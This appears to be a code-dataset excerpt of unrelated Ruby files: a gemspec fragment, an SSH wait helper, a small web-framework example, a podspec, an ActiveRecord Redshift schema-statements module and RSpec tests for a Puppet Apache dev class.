`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.required_ruby_version = '~>2.5'
spec.add_development_dependency 'bundler', '~>2.0'
spec.add_development_dependency 'rake', '~>12.3'
spec.add_development_dependency 'rspec', '~>3.8'
spec.add_development_dependency 'webmock', '~>3.5'
spec.add_runtime_dependency 'learnosity-sdk', '0.1.0'
spec.add_runtime_dependency 'rare', '~>0.1.1'
end
| 38.205882 | 93 | 0.672825 |
edf22add8f710480be4a06942666c513bd09832b | 560 | require 'net/ssh'
module AmiSpec
class WaitForRC
def self.wait(ip_address, user, key)
Net::SSH.start(ip_address, user, keys: [key], paranoid: false) do |ssh|
        # Wait for the SysV-compatibility rc job to finish starting.
        # This only works on Ubuntu with upstart.
        # Detecting the OS and release would need something like this:
        # https://github.com/mizzy/specinfra/blob/master/lib/specinfra/helper/detect_os/debian.rb
ssh.exec 'while /usr/sbin/service rc status | grep -q "^rc start/running, process"; do sleep 1; done'
end
end
end
end
| 32.941176 | 109 | 0.669643 |
e8cc878c41e2a418920686d39d93afc5165745ec | 534 | # frozen_string_literal: true
require "yaframework"
app = Yaframework::Application
app.get "/" do
response.redirect "/html"
end
app.get "/html" do
response.html "This is <b>HTML</b>, where you cat use some <small>tags</small>.
<br/>JSON <a href=\"/json\">here</a>,
<br/>Plain text <a href=\"/text\">here</a>"
end
app.get "/text" do
response.text "Just plain text.<br/>Boring, even tags don't work..."
end
app.get "/json" do
response.json "{ \"The awesomeness of this framework\": \"100/100\" }"
end
app.listen(4567)
| 21.36 | 81 | 0.662921 |
5dfff5cd949992a5b631fce360a2ad3631f8bab0 | 962 | #
# Be sure to run `pod spec lint WZJBaseViewController.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see https://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |spec|
spec.name = "ZJPod"
spec.version = "1.2.7"
spec.summary = "Base Class "
spec.description = <<-DESC
BaseViewController
DESC
spec.homepage = "https://github.com/vstx143/ZJPod"
spec.license = "MIT"
spec.author = { "vstx143" => "[email protected]" }
spec.platform = :ios, "8.0"
spec.source = { :git => "https://github.com/vstx143/ZJPod.git", :tag => "#{spec.version}" }
spec.source_files = 'ZJPod','**/*.{h,m}'
spec.requires_arc = true
spec.dependency "DZNEmptyDataSet"
spec.dependency "MJRefresh"
spec.dependency "AFNetworking"
end
| 32.066667 | 97 | 0.685031 |
1df670c1b4170eaeaba296db8c8de93b694b4bf5 | 16,524 | module ActiveRecord
module ConnectionAdapters
module Redshift
class SchemaCreation < SchemaCreation
private
def visit_ColumnDefinition(o)
o.sql_type = type_to_sql(o.type, limit: o.limit, precision: o.precision, scale: o.scale)
super
end
def add_column_options!(sql, options)
column = options.fetch(:column) { return super }
if column.type == :uuid && options[:default] =~ /\(\)/
sql << " DEFAULT #{options[:default]}"
else
super
end
end
end
module SchemaStatements
# Drops the database specified on the +name+ attribute
# and creates it again using the provided +options+.
def recreate_database(name, options = {}) #:nodoc:
drop_database(name)
create_database(name, options)
end
# Create a new Redshift database. Options include <tt>:owner</tt>, <tt>:template</tt>,
# <tt>:encoding</tt> (defaults to utf8), <tt>:collation</tt>, <tt>:ctype</tt>,
# <tt>:tablespace</tt>, and <tt>:connection_limit</tt> (note that MySQL uses
# <tt>:charset</tt> while Redshift uses <tt>:encoding</tt>).
#
# Example:
# create_database config[:database], config
# create_database 'foo_development', encoding: 'unicode'
def create_database(name, options = {})
options = { encoding: 'utf8' }.merge!(options.symbolize_keys)
option_string = options.inject("") do |memo, (key, value)|
memo += case key
when :owner
" OWNER = \"#{value}\""
else
""
end
end
execute "CREATE DATABASE #{quote_table_name(name)}#{option_string}"
end
# Drops a Redshift database.
#
# Example:
# drop_database 'matt_development'
def drop_database(name) #:nodoc:
execute "DROP DATABASE #{quote_table_name(name)}"
end
# Returns the list of all tables in the schema search path or a specified schema.
def tables(name = nil)
if name
ActiveSupport::Deprecation.warn(<<-MSG.squish)
Passing arguments to #tables is deprecated without replacement.
MSG
end
select_values("SELECT tablename FROM pg_tables WHERE schemaname = ANY(current_schemas(false))", 'SCHEMA')
end
def data_sources # :nodoc
select_values(<<-SQL, 'SCHEMA')
SELECT c.relname
FROM pg_class c
LEFT JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE c.relkind IN ('r', 'v','m') -- (r)elation/table, (v)iew, (m)aterialized view
AND n.nspname = ANY (current_schemas(false))
SQL
end
# Returns true if table exists.
# If the schema is not specified as part of +name+ then it will only find tables within
# the current schema search path (regardless of permissions to access tables in other schemas)
def table_exists?(name)
ActiveSupport::Deprecation.warn(<<-MSG.squish)
#table_exists? currently checks both tables and views.
This behavior is deprecated and will be changed with Rails 5.1 to only check tables.
Use #data_source_exists? instead.
MSG
data_source_exists?(name)
end
def data_source_exists?(name)
name = Utils.extract_schema_qualified_name(name.to_s)
return false unless name.identifier
select_value(<<-SQL, 'SCHEMA').to_i > 0
SELECT COUNT(*)
FROM pg_class c
LEFT JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE c.relkind IN ('r','v','m') -- (r)elation/table, (v)iew, (m)aterialized view
AND c.relname = '#{name.identifier}'
AND n.nspname = #{name.schema ? "'#{name.schema}'" : 'ANY (current_schemas(false))'}
SQL
end
def views # :nodoc:
select_values(<<-SQL, 'SCHEMA')
SELECT c.relname
FROM pg_class c
LEFT JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE c.relkind IN ('v','m') -- (v)iew, (m)aterialized view
AND n.nspname = ANY (current_schemas(false))
SQL
end
def view_exists?(view_name) # :nodoc:
name = Utils.extract_schema_qualified_name(view_name.to_s)
return false unless name.identifier
select_values(<<-SQL, 'SCHEMA').any?
SELECT c.relname
FROM pg_class c
LEFT JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE c.relkind IN ('v','m') -- (v)iew, (m)aterialized view
AND c.relname = '#{name.identifier}'
AND n.nspname = #{name.schema ? "'#{name.schema}'" : 'ANY (current_schemas(false))'}
SQL
end
def drop_table(table_name, options = {})
execute "DROP TABLE #{quote_table_name(table_name)}#{' CASCADE' if options[:force] == :cascade}"
end
# Returns true if schema exists.
def schema_exists?(name)
select_value("SELECT COUNT(*) FROM pg_namespace WHERE nspname = '#{name}'", 'SCHEMA').to_i > 0
end
def index_name_exists?(table_name, index_name, default)
false
end
# Returns an array of indexes for the given table.
def indexes(table_name, name = nil)
[]
end
# Returns the list of all column definitions for a table.
def columns(table_name)
column_definitions(table_name.to_s).map do |column_name, type, default, notnull, oid, fmod|
default_value = extract_value_from_default(default)
type_metadata = fetch_type_metadata(column_name, type, oid, fmod)
default_function = extract_default_function(default_value, default)
new_column(column_name, default_value, type_metadata, notnull == 'f', table_name, default_function)
end
end
def new_column(name, default, sql_type_metadata = nil, null = true, table_name = nil, default_function = nil) # :nodoc:
RedshiftColumn.new(name, default, sql_type_metadata, null, default_function)
end
# Returns the current database name.
def current_database
select_value('select current_database()', 'SCHEMA')
end
# Returns the current schema name.
def current_schema
select_value('SELECT current_schema', 'SCHEMA')
end
# Returns the current database encoding format.
def encoding
select_value("SELECT pg_encoding_to_char(encoding) FROM pg_database WHERE datname LIKE '#{current_database}'", 'SCHEMA')
end
def collation
end
def ctype
end
# Returns an array of schema names.
def schema_names
select_value(<<-SQL, 'SCHEMA')
SELECT nspname
FROM pg_namespace
WHERE nspname !~ '^pg_.*'
AND nspname NOT IN ('information_schema')
ORDER by nspname;
SQL
end
# Creates a schema for the given schema name.
def create_schema schema_name
execute "CREATE SCHEMA #{quote_schema_name(schema_name)}"
end
# Drops the schema for the given schema name.
def drop_schema(schema_name, options = {})
execute "DROP SCHEMA#{' IF EXISTS' if options[:if_exists]} #{quote_schema_name(schema_name)} CASCADE"
end
# Sets the schema search path to a string of comma-separated schema names.
# Names beginning with $ have to be quoted (e.g. $user => '$user').
# See: http://www.postgresql.org/docs/current/static/ddl-schemas.html
#
        # This should not be called manually but set in database.yml.
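        # For example (illustrative), a database.yml entry such as:
        #
        #   schema_search_path: "analytics,public"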
def schema_search_path=(schema_csv)
if schema_csv
execute("SET search_path TO #{schema_csv}", 'SCHEMA')
@schema_search_path = schema_csv
end
end
# Returns the active schema search path.
def schema_search_path
@schema_search_path ||= select_value('SHOW search_path', 'SCHEMA')
end
# Returns the sequence name for a table's primary key or some other specified key.
def default_sequence_name(table_name, pk = nil) #:nodoc:
result = serial_sequence(table_name, pk || 'id')
return nil unless result
Utils.extract_schema_qualified_name(result).to_s
rescue ActiveRecord::StatementInvalid
Redshift::Name.new(nil, "#{table_name}_#{pk || 'id'}_seq").to_s
end
def serial_sequence(table, column)
select_value("SELECT pg_get_serial_sequence('#{table}', '#{column}')", 'SCHEMA')
end
def set_pk_sequence!(table, value) #:nodoc:
end
def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:
end
def pk_and_sequence_for(table) #:nodoc:
[nil, nil]
end
# Returns just a table's primary key
def primary_keys(table)
pks = query(<<-end_sql, 'SCHEMA')
SELECT DISTINCT attr.attname
FROM pg_attribute attr
INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid
INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = any(cons.conkey)
WHERE cons.contype = 'p'
AND dep.refobjid = '#{quote_table_name(table)}'::regclass
end_sql
pks.present? ? pks[0] : pks
end
        # Renames a table. Unlike the PostgreSQL adapter, the primary key
        # sequence is not renamed here.
#
# Example:
# rename_table('octopuses', 'octopi')
def rename_table(table_name, new_name)
clear_cache!
execute "ALTER TABLE #{quote_table_name(table_name)} RENAME TO #{quote_table_name(new_name)}"
end
def add_column(table_name, column_name, type, options = {}) #:nodoc:
clear_cache!
super
end
# Changes the column of a table.
def change_column(table_name, column_name, type, options = {})
clear_cache!
quoted_table_name = quote_table_name(table_name)
sql_type = type_to_sql(type, limit: options[:limit], precision: options[:precision], scale: options[:scale])
sql = "ALTER TABLE #{quoted_table_name} ALTER COLUMN #{quote_column_name(column_name)} TYPE #{sql_type}"
sql << " USING #{options[:using]}" if options[:using]
if options[:cast_as]
sql << " USING CAST(#{quote_column_name(column_name)} AS #{type_to_sql(options[:cast_as], limit: options[:limit], precision: options[:precision], scale: options[:scale])})"
end
execute sql
change_column_default(table_name, column_name, options[:default]) if options_include_default?(options)
change_column_null(table_name, column_name, options[:null], options[:default]) if options.key?(:null)
end
# Changes the default value of a table column.
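        # Examples (illustrative):
        #
        #   change_column_default(:users, :status, 'draft')  # SET DEFAULT 'draft'
        #   change_column_default(:users, :status, nil)      # DROP DEFAULT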
def change_column_default(table_name, column_name, default_or_changes)
clear_cache!
column = column_for(table_name, column_name)
return unless column
default = extract_new_default_value(default_or_changes)
alter_column_query = "ALTER TABLE #{quote_table_name(table_name)} ALTER COLUMN #{quote_column_name(column_name)} %s"
if default.nil?
            # <tt>DEFAULT NULL</tt> results in the same behavior as <tt>DROP DEFAULT</tt>. However, PostgreSQL will
            # cast the default to the column's type, which leaves us with a default like "default NULL::character varying".
execute alter_column_query % "DROP DEFAULT"
else
execute alter_column_query % "SET DEFAULT #{quote_default_value(default, column)}"
end
end
def change_column_null(table_name, column_name, null, default = nil)
clear_cache!
unless null || default.nil?
column = column_for(table_name, column_name)
execute("UPDATE #{quote_table_name(table_name)} SET #{quote_column_name(column_name)}=#{quote_default_value(default, column)} WHERE #{quote_column_name(column_name)} IS NULL") if column
end
execute("ALTER TABLE #{quote_table_name(table_name)} ALTER #{quote_column_name(column_name)} #{null ? 'DROP' : 'SET'} NOT NULL")
end
# Renames a column in a table.
def rename_column(table_name, column_name, new_column_name) #:nodoc:
clear_cache!
execute "ALTER TABLE #{quote_table_name(table_name)} RENAME COLUMN #{quote_column_name(column_name)} TO #{quote_column_name(new_column_name)}"
end
def add_index(table_name, column_name, options = {}) #:nodoc:
end
def remove_index!(table_name, index_name) #:nodoc:
end
def rename_index(table_name, old_name, new_name)
end
def foreign_keys(table_name)
fk_info = select_all(<<-SQL.strip_heredoc, 'SCHEMA')
SELECT t2.relname AS to_table, a1.attname AS column, a2.attname AS primary_key, c.conname AS name, c.confupdtype AS on_update, c.confdeltype AS on_delete
FROM pg_constraint c
JOIN pg_class t1 ON c.conrelid = t1.oid
JOIN pg_class t2 ON c.confrelid = t2.oid
JOIN pg_attribute a1 ON a1.attnum = c.conkey[1] AND a1.attrelid = t1.oid
JOIN pg_attribute a2 ON a2.attnum = c.confkey[1] AND a2.attrelid = t2.oid
JOIN pg_namespace t3 ON c.connamespace = t3.oid
WHERE c.contype = 'f'
AND t1.relname = #{quote(table_name)}
AND t3.nspname = ANY (current_schemas(false))
ORDER BY c.conname
SQL
fk_info.map do |row|
options = {
column: row['column'],
name: row['name'],
primary_key: row['primary_key']
}
options[:on_delete] = extract_foreign_key_action(row['on_delete'])
options[:on_update] = extract_foreign_key_action(row['on_update'])
ForeignKeyDefinition.new(table_name, row['to_table'], options)
end
end
def extract_foreign_key_action(specifier) # :nodoc:
case specifier
when 'c'; :cascade
when 'n'; :nullify
when 'r'; :restrict
end
end
def index_name_length
63
end
# Maps logical Rails types to PostgreSQL-specific data types.
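        # For example (illustrative), integer limits map to Redshift-friendly types:
        #
        #   type_to_sql(:integer, limit: 2)  # => "smallint"
        #   type_to_sql(:integer)            # => "integer"
        #   type_to_sql(:integer, limit: 8)  # => "bigint"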
def type_to_sql(type, limit: nil, precision: nil, scale: nil, **)
case type.to_s
when 'integer'
return 'integer' unless limit
case limit
when 1, 2; 'smallint'
when nil, 3, 4; 'integer'
when 5..8; 'bigint'
else raise(ActiveRecordError, "No integer type has byte size #{limit}. Use a numeric with precision 0 instead.")
end
else
super
end
end
# PostgreSQL requires the ORDER BY columns in the select list for distinct queries, and
# requires that the ORDER BY include the distinct column.
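        # For example (illustrative):
        #
        #   columns_for_distinct("posts.id", ["posts.created_at DESC"])
        #   # => "posts.id, posts.created_at AS alias_0"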
def columns_for_distinct(columns, orders) #:nodoc:
order_columns = orders.reject(&:blank?).map{ |s|
# Convert Arel node to string
s = s.to_sql unless s.is_a?(String)
# Remove any ASC/DESC modifiers
s.gsub(/\s+(?:ASC|DESC)\b/i, '')
.gsub(/\s+NULLS\s+(?:FIRST|LAST)\b/i, '')
}.reject(&:blank?).map.with_index { |column, i| "#{column} AS alias_#{i}" }
[super, *order_columns].join(', ')
end
def fetch_type_metadata(column_name, sql_type, oid, fmod)
cast_type = get_oid_type(oid.to_i, fmod.to_i, column_name, sql_type)
simple_type = SqlTypeMetadata.new(
sql_type: sql_type,
type: cast_type.type,
limit: cast_type.limit,
precision: cast_type.precision,
scale: cast_type.scale,
)
TypeMetadata.new(simple_type, oid: oid, fmod: fmod)
end
end
end
end
end
| 39.342857 | 197 | 0.599129 |
e2e0b47af866de5e2950340381b54acaad0be396 | 2,182 | require 'spec_helper'
describe 'apache::dev', :type => :class do
context "on a Debian OS" do
let :facts do
{
:lsbdistcodename => 'squeeze',
:osfamily => 'Debian',
:operatingsystem => 'Debian',
:operatingsystemrelease => '6',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
it { is_expected.to contain_package("libaprutil1-dev") }
it { is_expected.to contain_package("libapr1-dev") }
it { is_expected.to contain_package("apache2-prefork-dev") }
end
context "on an Ubuntu 14 OS" do
let :facts do
{
:lsbdistrelease => '14.04',
:lsbdistcodename => 'trusty',
:osfamily => 'Debian',
:operatingsystem => 'Ubuntu',
:operatingsystemrelease => '14.04',
:is_pe => false,
}
end
it { is_expected.to contain_package("apache2-dev") }
end
context "on a RedHat OS" do
let :facts do
{
:osfamily => 'RedHat',
:operatingsystem => 'RedHat',
:operatingsystemrelease => '6',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
it { is_expected.to contain_package("httpd-devel") }
end
context "on a FreeBSD OS" do
let :pre_condition do
'include apache::package'
end
let :facts do
{
:osfamily => 'FreeBSD',
:operatingsystem => 'FreeBSD',
:operatingsystemrelease => '9',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
end
context "on a Gentoo OS" do
let :pre_condition do
'include apache::package'
end
let :facts do
{
:osfamily => 'Gentoo',
:operatingsystem => 'Gentoo',
:operatingsystemrelease => '3.16.1-gentoo',
:concat_basedir => '/dne',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
end
end
| 29.486486 | 64 | 0.512374 |